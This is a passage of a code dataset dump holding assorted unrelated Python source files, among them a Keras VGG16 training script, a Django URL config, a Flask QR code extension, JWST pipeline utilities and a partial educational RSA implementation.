padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n \n \n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dense(units=4096,activation=\"relu\"))\n #model.add(Dense(units=2, activation=\"softmax\"))\n model.add(Dense(units=1, activation=\"softmax\"))\n \n #VGG16_cnn_model.compile(optimizer='adam',\n # loss='sparse_categorical_crossentropy',\n # metrics=['accuracy'])\n\n\n #model_summary = VGG16_cnn_model.summary()\n #print(model_summary)\n\n sgd = tf.keras.optimizers.SGD(learning_rate= i[1], momentum=0.0, nesterov=False, name='SGD')\n\n VGG16_cnn_model.compile(loss = i[0],\n optimizer = sgd,\n metrics = ['accuracy'])\n \n model_summary = VGG16_cnn_model.summary()\n print(model_summary)\n\n\n ############################################################\n # Train Model:\n ############################################################\n\n batch_size = 128\n training_size = 2148\n testing_size = 538\n epochs = 5\n\n fn_steps_per_epoch = lambda x: int(math.ceil(1. * x / batch_size))\n steps_per_epoch = fn_steps_per_epoch(training_size)\n test_steps = fn_steps_per_epoch(testing_size)\n\n # Extract dataset from folder:\n train_datagen = ImageDataGenerator(rescale = 1/255)\n test_datagen = ImageDataGenerator(rescale = 1/255)\n\n # get training images\n train_gen = train_datagen.flow_from_directory(\n r'.\\cleaned_data\\train',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # get testing images\n test_gen = test_datagen.flow_from_directory(\n r'.\\cleaned_data\\test',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # train model\n history = VGG16_cnn_model.fit(\n train_gen,\n steps_per_epoch = steps_per_epoch,\n epochs = epochs,\n validation_data = test_gen,\n validation_steps = test_steps\n )\n\n ############################################################\n # Export Model to working Directory:\n ############################################################\n\n model_name_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1])\n model_weights_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1] + \"_weights\")\n\n VGG16_cnn_model.save(model_name_loc)\n VGG16_cnn_model.save_weights(model_weights_loc) \n\n","sub_path":"scripts/train_VGG16.py","file_name":"train_VGG16.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"423170572","text":"# coding=utf-8\n\nimport pandas as pd\n\n\nclass MzData:\n def read(self, csv: str,\n start_symbol: str=\"s\", goal_symbol: str=\"g\", flag_symbol: str=\"f\"):\n df = pd.read_csv(csv, dtype='str', index_col='row')\n self.shape = df.shape\n\n df_fg = df == flag_symbol\n df_start = df == start_symbol\n df_goal = df == goal_symbol\n self.flags = []\n self.walls = []\n\n for row in range(-1, df.shape[0]+1):\n for col in range(-1, df.shape[1]+1):\n if 0 <= row < df.shape[0] and 0 <= col < df.shape[1]:\n pass\n else:\n self.walls.append([row, col])\n\n for row in range(df.shape[0]):\n for col in range(df.shape[1]):\n if df_fg.iat[row, col]:\n self.flags.append([row, col])\n if df_start.iat[row, col]:\n self.start = [row, col]\n if df_goal.iat[row, col]:\n self.goal = [row, col]","sub_path":"maze/mz_data.py","file_name":"mz_data.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"437475388","text":"from config.config import mongo\n\nclass Dampak():\n __schema = {\n \"kppn\": \"156\",\n \"level\": \"\",\n \"level_desc\": \"\",\n \"area_dampak\": {\n \"fraud\": \"\",\n \"non_fraud\": \"\"\n },\n \"reputasi\": [],\n \"sanksi\": \"\",\n \"kecelakaan\": \"\",\n \"gangguan\": \"\",\n \"kinerja\": \"\"\n }\n\n\n def find(self):\n try:\n query = mongo.db.dampak.find()\n except:\n raise Exception('db connection error')\n \n parsed_cursor = []\n\n for parsed in query:\n parsed['_id'] = str(parsed['_id'])\n parsed_cursor.append(parsed)\n\n return parsed_cursor\n\n\n def insert(self, dampak_object):\n try:\n mongo.db.dampak.insert(dampak_object)\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n\n def update(self, dampak_object):\n try:\n mongo.db.dampak.update(dampak_object['query'], dampak_object['data'])\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n def delete(self, delete_criteria):\n try:\n mongo.db.dampak.delete_one(delete_criteria)\n except:\n raise Exception('db connection error')\n\n return {\n \"status\": \"success\"\n }","sub_path":"models/dampak.py","file_name":"dampak.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"525502701","text":"from datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', app.views.home, name='home'),\n url(r'^saskaita', app.views.SaskaitaView.as_view(), name='saskaita'),\n url(r'^duomenys', app.views.DuomenysView.as_view(), name='duomenys'),\n url(r'^nurasymas', app.views.NurasymasView.as_view(), name='nurasymas'),\n url(r'^ruosiniai', app.views.RuosiniaiView.as_view(), name='ruosiniai'),\n url(r'^account', app.views.AccountView.as_view(), name='account'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'PVM saskaitu tvarkymo sistema',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n url(r'^admin/', include(admin.site.urls))\n]\n","sub_path":"Python/Python_5/DjangoWebsite/DjangoWebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"98253736","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n#执行API调用并存储相应\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\nr = requests.get(url)\nprint(\"Status code:\", r.status_code) #状态码200表示成功\n\nresponse_dict = r.json() # 将API响应为json格式,转换为python字典\nprint(\"Total repositories: \",response_dict['total_count']) #GitHub包含py仓库总数\n\nrepo_dicts=response_dict[\"items\"] #返回的仓库字典的列表\n\nnames, plot_dicts=[],[] \nfor repo_dict in repo_dicts:\n names.append(repo_dict[\"name\"])\n plot_dict={\"value\":repo_dict[\"stargazers_count\"], \n \"label\":str(repo_dict[\"description\"]),\n \"xlink\":str(repo_dict[\"html_url\"])} #注意这里的str函数\n plot_dicts.append(plot_dict)\n\n#可视化\nmy_style = LS('#333366', base_style=LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15 #缩减长标签为15字符,鼠标悬停显示全称\nmy_config.show_y_guides = False #隐去水平虚线\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Projects on GitHub'\nchart.x_labels = names\nchart.add('', plot_dicts)\nchart.render_to_file('python_repos2.svg')","sub_path":"mycodes/chapter17/python_repos2.py","file_name":"python_repos2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"10229585","text":"import sys\nsys.stdin = open(\"4_이진힙\", \"r\")\n\ndef insert(n):\n # 일단 바로 뒤에 넣고, 최소힙이니까, 부모보다 작으면 계속 올라가야함\n G.append(nums[n])\n p = n # 내 위치를 p에 저장하고\n # 내 위치가 0보다 크면서 부모가 나보다 크면 바꿔야함\n while(p > 0 and G[p//2] > G[p]): # 만약 부모가 더 크면 => 부모와 위치 바꿔\n temp = G[p//2]\n G[p//2] = G[p]\n G[p] = temp\n p = p//2 # 그리고 이제 내위치가 부모위치, 그럼 또 그 위의 부모랑 비교해서 올라가야함\n\nT = int(input())\nfor t in range(1, T+1):\n n = int(input())\n nums = list(map(int, input().split()))\n nums.insert(0,0)\n G = [0]\n\n for i in range(1, n+1):\n # 리스트가 비어있으면 그냥 첫번째에 넣고\n if i == 1 :\n G.append(nums[i])\n # 아니면 앞의 노드들과 비교해서 넣어야함\n else: insert(i)\n\n sum1 = 0\n p = len(G)-1\n while p > 0:\n sum1 += G[p//2]\n p = p//2\n print(f\"#{t} {sum1}\")\n\n\n\n","sub_path":"day16-Tree/4_이진힙.py","file_name":"4_이진힙.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"442801303","text":"import json\nfrom backends.abstract_backend import AbstractBackend\n\nFILENAME = 'links_db.json'\n\n\nclass JSONBackend(AbstractBackend):\n def __init__(self):\n super().__init__()\n self._load_data()\n\n def _load_data(self):\n try:\n with open(FILENAME) as file:\n self.storage = json.load(file)\n except FileNotFoundError:\n self.storage = {}\n\n def close(self):\n with open(FILENAME, 'w') as file:\n json.dump(self.storage, file, indent=2)\n","sub_path":"Lesson10/backends/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"162480012","text":"#!/usr/bin/env python3.7\n\"\"\"Google certified android devices tracker\"\"\"\n\nimport difflib\nimport json\nfrom datetime import date\nfrom os import rename, path, system, environ\nfrom requests import get, post\n\nGIT_OAUTH_TOKEN = environ['GIT_OAUTH_TOKEN_XFU']\nBOT_TOKEN = environ['bottoken']\nTODAY = str(date.today())\n\n\ndef fetch():\n \"\"\"\n Download latest and convert to utf-8\n \"\"\"\n url = \"http://storage.googleapis.com/play_public/supported_devices.csv\"\n response = get(url)\n data = (response.content.decode('utf-16'))\n data_list = list(data.split('\\n'))\n with open('README.md', 'w', encoding=\"utf-8\") as markdown,\\\n open('devices.json', 'w') as json_out:\n markdown.write('# Google Play Certified Android devices\\n')\n markdown.write('Last sync is {}\\n\\nhttps://support.google.com/googleplay/'\n 'answer/1727131?hl=en\\n\\n'.format(TODAY))\n markdown.write('|Retail Branding|Marketing Name|Device|Model|\\n')\n markdown.write('|---|---|---|---|\\n')\n devices = []\n for line in data_list[1:]:\n i = line.strip().replace(\" \", \" \").split(\",\")\n try:\n brand = i[0]\n name = i[1]\n device = i[2]\n model = i[3]\n markdown.write('|{}|{}|{}|{}|\\n'.format(brand, name, device, model))\n devices.append({'brand': brand, 'name': name, 'device': device, 'model': model})\n except IndexError:\n pass\n json.dump(devices, json_out, indent=1)\n\n\ndef diff_files():\n \"\"\"\n diff\n \"\"\"\n with open('old.md', 'r') as old, open('README.md', 'r') as new:\n diff = difflib.unified_diff(old.readlines(), new.readlines(), fromfile='old', tofile='new')\n changes = []\n for line in diff:\n if line.startswith('+'):\n changes.append(str(line))\n new = ''.join(changes[2:]).replace(\"+\", \"\")\n with open('changes', 'w') as out:\n out.write(new)\n\n\ndef post_to_tg():\n \"\"\"\n post new devices to telegram channel\n \"\"\"\n # tg\n telegram_chat = \"@CertifiedAndroidDevices\"\n with open('changes', 'r') as changes:\n for line in changes:\n info = line.split(\"|\")\n brand = info[1]\n name = info[2]\n codename = info[3]\n model = info[4]\n telegram_message = f\"New certified device added!: \\n\" \\\n f\"Brand: *{brand}*\\n\" \\\n f\"Name: *{name}*\\n\" \\\n f\"*Codename:* `{codename}`\\n\" \\\n f\"Model: *{model}*\"\n params = (\n ('chat_id', telegram_chat),\n ('text', telegram_message),\n ('parse_mode', \"Markdown\"),\n ('disable_web_page_preview', \"yes\")\n )\n telegram_url = \"https://api.telegram.org/bot\" + BOT_TOKEN + \"/sendMessage\"\n telegram_req = post(telegram_url, params=params)\n telegram_status = telegram_req.status_code\n if telegram_status == 200:\n print(\"{0}: Telegram Message sent\".format(name))\n else:\n print(\"Telegram Error\")\n\n\ndef git_commit_push():\n \"\"\"\n git add - git commit - git push\n \"\"\"\n system(\"git add README.md devices.json && git -c \\\"user.name=XiaomiFirmwareUpdater\\\" \"\n \"-c \\\"user.email=xiaomifirmwareupdater@gmail.com\\\" \"\n \"commit -m \\\"[skip ci] sync: {0}\\\" && \"\" \\\n \"\"git push -q https://{1}@github.com/androidtrackers/\"\n \"certified-android-devices.git HEAD:master\"\n .format(TODAY, GIT_OAUTH_TOKEN))\n\n\ndef main():\n \"\"\"\n certified-android-devices tracker\n \"\"\"\n if path.exists('README.md'):\n rename('README.md', 'old.md')\n fetch()\n diff_files()\n post_to_tg()\n git_commit_push()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"189601553","text":"from .base import FunctionalTest\n\nclass InspectGameTest(FunctionalTest):\n def select_message_node(self, svg_circle_element):\n svg_circle_element.find_element_by_xpath(\"..\").click()\n\n def test_inspect_game(self):\n \"\"\"Marcus looks at the results of an ongoing game.\"\"\"\n game_name = 'In Progress Game'\n self.create_game(game_name, nchains=4, depth=4)\n\n # Marcus goes to the games list and inspects the game\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He sees the nodes rendered on the svg element\n nodes = self.select_svg_nodes()\n # 1 game node, 4 chain nodes, and each chain has 1 seed and 4 children\n expected_num_nodes = 1 + 4 + (4 * 5)\n self.assertEquals(len(nodes), expected_num_nodes)\n\n def test_close_chain(self):\n \"\"\"Marcus decides to close a branch.\"\"\"\n game_name = 'Dead End Game'\n self.create_game(game_name, nchains=1, depth=1)\n\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He selects one of the child nodes.\n nodes = self.select_svg_nodes()\n expected_num_nodes = 1 + 1 + 2\n self.assertEquals(len(nodes), expected_num_nodes)\n\n message_nodes = self.select_message_nodes()\n self.assertEquals(len(message_nodes), 2)\n\n seed_message = message_nodes[0]\n self.select_message_node(seed_message)\n\n # He presses the button to edit it.\n\n # He changes the number of children to 0.\n\n # He saves his changes.\n\n # The node now shows that it is rejected, and that it is closed.\n","sub_path":"ftests/test_inspect_game.py","file_name":"test_inspect_game.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"367389777","text":"\"\"\"\nThis script tests the savings from using lru cache.\n\"\"\"\n\nimport functools\n\nclass MyVision:\n counter = 0\n\n @functools.lru_cache(maxsize=int(2**8))\n def my_dummy_calc(self, x, y, z):\n if x.x > y.x:\n return self.my_dummy_calc(y, x, z)\n self.counter+=1\n return x\n\nfrom collections import namedtuple\n\nquack = namedtuple(\"quack\", \"x y\")\n\nm = MyVision()\n\nquacks = list()\nfor i in range(8):\n for j in range(8):\n quacks.append( quack(i,j) )\n\nimport random\n\nresults = []\n\nqs = quacks[:5]\n\nwhile len(results) < 500_000:\n if random.random() < 0.9:\n q1 = random.choice(qs)\n q2 = random.choice(qs)\n q3 = random.choice(qs)\n\n else:\n q1 = random.choice(quacks)\n q2 = random.choice(quacks)\n q3 = random.choice(quacks)\n\n results.append(m.my_dummy_calc(q1,q2,q3))\n\nprint(m.counter)\n\n\n\n","sub_path":"tests/_conceptual/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"45471059","text":"# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nfrom copy import copy\nfrom importlib import import_module\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\n\nfrom . import entry_points\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Step classes that are not user-api steps\nNON_STEPS = [\n 'EngDBLogStep',\n 'FunctionWrapper',\n 'Pipeline',\n 'Step',\n 'SystemCall',\n]\n\n\ndef resolve_step_class_alias(name):\n \"\"\"\n If the input is a recognized alias, return the\n corresponding fully-qualified class name. Otherwise\n return the input unmodified.\n\n Parameters\n ----------\n name : str\n\n Returns\n -------\n str\n \"\"\"\n for info in entry_points.get_steps():\n if info.class_alias is not None and name == info.class_alias:\n return info.class_name\n\n return name\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. 
If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. 
False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\ndef all_steps():\n \"\"\"List all classes subclassed from Step\n\n Returns\n -------\n steps : dict\n Key is the classname, value is the class\n \"\"\"\n from jwst.stpipe import Step\n\n jwst = import_module('jwst')\n jwst_fpath = os.path.split(jwst.__file__)[0]\n\n steps = {}\n for module in load_local_pkg(jwst_fpath):\n more_steps = {\n klass_name: klass\n for klass_name, klass in inspect.getmembers(\n module,\n lambda o: inspect.isclass(o) and issubclass(o, Step)\n )\n if klass_name not in NON_STEPS\n }\n steps.update(more_steps)\n\n return steps\n\n\ndef load_local_pkg(fpath):\n \"\"\"Generator producing all modules under fpath\n\n Parameters\n ----------\n fpath: string\n File path to the package to load.\n\n Returns\n -------\n generator\n `module` for each module found in the package.\n \"\"\"\n package_fpath, package = os.path.split(fpath)\n package_fpath_len = len(package_fpath) + 1\n sys_path = copy(sys.path)\n sys.path.insert(0, package_fpath)\n try:\n for module_fpath in folder_traverse(\n fpath, basename_regex=r'[^_].+\\.py$', path_exclude_regex='tests'\n ):\n folder_path, fname = os.path.split(module_fpath[package_fpath_len:])\n module_path = folder_path.split('/')\n module_path.append(os.path.splitext(fname)[0])\n module_path = '.'.join(module_path)\n try:\n module = import_module(module_path)\n except Exception as err:\n logger.debug(f'Cannot load module \"{module_path}\": {str(err)}')\n else:\n yield module\n except Exception as err:\n logger.debug(f'Cannot complete package loading: Exception occurred: \"{str(err)}\"')\n finally:\n sys.path = sys_path\n\n\ndef folder_traverse(folder_path, basename_regex='.+', path_exclude_regex='^$'):\n \"\"\"Generator of full file paths for all files\n in a folder.\n\n Parameters\n ----------\n folder_path: str\n The folder to traverse\n\n basename_regex: str\n Regular expression that must match\n the `basename` part of the file path.\n\n path_exclude_regex: str\n Regular expression to exclude a path.\n\n Returns\n -------\n generator\n A generator, return the next file.\n \"\"\"\n basename_regex = re.compile(basename_regex)\n path_exclude_regex = re.compile(path_exclude_regex)\n for root, dirs, files in os.walk(folder_path):\n if path_exclude_regex.search(root):\n continue\n for file in files:\n if basename_regex.match(file):\n yield os.path.join(root, file)\n","sub_path":"jwst/stpipe/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"241486437","text":"import os\nfrom sys import platform, stdout\nfrom time import sleep\n\n\n#-------------------------------------------\n# Logic Functions\nfrom getText import *\nfrom slowPrint import *\nfrom printLines import *\nfrom clearScreen import *\nfrom changeScreenSize import *\n\n\n# \"Waiting\" animation with dots. Allows control over the number of dots in each cycle, the amount of cycles, and the time between each dot.\ndef waitingDots(num_of_dots, num_of_loops, dot_speed, char):\n l = 0\n str = char * num_of_dots # All dots in 1 string\n while l < num_of_loops:\n for char in str: # Print each character in str with dot_speed amount of time in between\n print(char, end=\"\", flush=\"True\")\n sleep(dot_speed)\n for char in str: # Go back one space and clear it for each dot\n stdout.write(\"\\b\" * num_of_dots)\n stdout.write(\" \" * num_of_dots)\n stdout.write(\"\\b\" * num_of_dots)\n l = l + 1\n\n\n#-------------------------------------------\n# Story functions\n\nfrom story import *\n\n\n#-------------------------------------------\n# Start script\n\nchangeScreenSize(66, 38)\n\nprint(getText(\"txtimgs/tree.txt\"))\nprint(getText(\"txtimgs/helloyou.txt\"))\ninput(\"Press [ENTER] to start...\")\n\nsleep(1)\n\nchangeScreenSize(50, 4)\n\ntitle = \"Verhaal van een nieuwkomer\".center(50, \"-\")\nprint(\"\\n\"+title)\nloading = \"[»-(¯`·.·´¯)->...LOADING...<-(¯`·.·´¯)-«]\".center(50)\nslowPrint(loading, 0.01, 0.13)\nslowPrint(\"...\", 0.8, 0.8)\n\nchangeScreenSize(100, 25)\n\n\n#-------------------------------------------\n# Explanation\n\nprint('')\nprint(\"Uitleg\".center(100, \"-\"))\nsleep(0.5)\nprint('\\n\\n')\nprint('- Het spel bestaat uit stukjes verhaal (\"secties\") en vragen;'.center(100))\nsleep(1.5)\nprint('- Bij elke vraag kun je A, B en soms C antwoorden;'.center(100))\nsleep(1.5)\nprint('- De keuzes die je maakt beïnvloeden hoe het verhaal verloopt. Maak je keuzes aandachtig.'.center(100))\nsleep(2.5)\n\nx = input('\\n\\n\\n\\n\\n\\nOm het spel te starten, druk op [ENTER]. Om de credits te bekijken, typ \"credits\".\\n')\n\nclearScreen()\n\nif x.lower() == \"credits\":\n\n print('\\n')\n print('Credits'.center(100, \"-\"))\n print('\\n\\nDit keuzeverhaal spel is gemaakt door Mavis de Ridder uit klas SD1C van het Mediacollege Amsterdam, als eind-beroepsopdracht voor periode 1, jaar 1.')\n print('\\n\\nDe GitHub link voor dit project is: [https://github.com/pinkflamey/HelloYou]')\n\n input('Druk op [ENTER] om het spel te starten...')\n clearScreen()\n t1()\n \nelse:\n\n clearScreen()\n t1()","sub_path":"python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"550547647","text":"n=int(input())\r\nflag=0\r\na=[]\r\ntf=[]\r\nvalue=0\r\nfor i in range(n):\r\n a=[]\r\n fine=0\r\n months=int(input())\r\n x=input()\r\n value=x.find('0')\r\n if value>=0:\r\n x=x[value:]\r\n a=x.split(' ')\r\n fine=0\r\n for j in a:\r\n j=int(j)\r\n if j==0:\r\n fine=fine+1100\r\n elif j==1:\r\n fine=fine+100\r\n tf.append(fine)\r\nfor k in tf:\r\n print(k,end=\"\\n\")\r\n \r\n","sub_path":"chefapr1.py","file_name":"chefapr1.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"330686330","text":"\"\"\"\nSupport PY3,Use BytesIO instead of StringIO\n\"\"\"\nfrom io import BytesIO\nimport base64\n\nfrom flask import render_template, Blueprint, Markup, url_for\nimport qrcode as qrc\n\ncorrection_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n}\n\n\ndef qrcode(data, version=None, error_correction='L', box_size=10, border=0, fit=True):\n # makes qr image using qrcode as qrc\n qr = qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n # io = StringIO()\n sio = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(sio)\n return \"data:image/png;base64,\" + base64.b64encode(sio.getvalue()).decode()\n\n\nclass QRcode(object):\n\n def __init__(self, app=None, **kwargs):\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n self.register_blueprint(app)\n app.add_template_filter(qrcode)\n app.add_template_global(qrcode)\n\n def register_blueprint(self, app):\n module = Blueprint('qrcode',\n __name__,\n template_folder='templates')\n app.register_blueprint(module)\n return module\n","sub_path":"flask_qrcode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396433903","text":"# RSA implementation based on http://code.activestate.com/recipes/577737-public-key-encryption-rsa/\n\nfrom random import randrange\nfrom collections import namedtuple\nfrom math import log\nfrom base64 import b64encode, b64decode\n\nPRIME_LOWER_BOUND = 10e3\nPRIME_UPPER_BOUND = 10e6\n\nKeyPair = namedtuple(\"KeyPair\", \"public private\")\nKey = namedtuple(\"Key\", \"exp mod\")\n\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\ndef gcd(a, b):\n \"\"\"Retorna o maior divisor comum de a e b.\"\"\"\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcm(a, b):\n \"\"\"Retorna o menor múltiplo comum de a e b.\"\"\"\n return (a * b) // gcd(a, b)\n\n# https://en.wikipedia.org/wiki/Modular_expiation\ndef modular_pow(base, exp, mod):\n \"\"\"Retorna o valor de base elevado a exp no módulo mod.\"\"\"\n if mod == 1:\n return 0\n result = 1\n base = base % mod\n while exp > 0:\n if exp % 2 == 1:\n result = (result * base) % mod\n exp = exp // 2\n base = (base * base) % mod\n return result\n\n# https://en.wikipedia.org/wiki/Primality_test\ndef is_prime_naive(n):\n \"\"\"Retorna se o número n é primo. Implementação 'ingênua'.\"\"\"\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef is_prime(n, k=30):\n \"\"\"Retorna se o número n é primo. Algoritmo de Miller-Rabin.\n O parâmetro k corresponde à acurácia do teste.\"\"\"\n\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n \n # escrever n-1 com d*(2^s), onde d é ímpar\n s, d = 0, n-1\n while d % 2 == 0:\n s, d = s + 1, d // 2\n assert (2 ** s) * d == n-1 and d % 2 == 1\n\n for i in range(k):\n a = randrange(2, n-1)\n x = modular_pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for r in range(1, s):\n x = (x * x) % n\n if x == 1:\n return False\n if x == n-1:\n break\n else:\n return False\n \n return True\n\ndef random_prime(lower, upper):\n \"\"\"Retorna um número primo no intervalo [lower, upper).\"\"\"\n p = 1\n while not is_prime(p):\n p = randrange(lower, upper)\n return p\n\n# http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm\ndef multiplicative_inverse(a, mod):\n \"\"\"Retorna o inverso 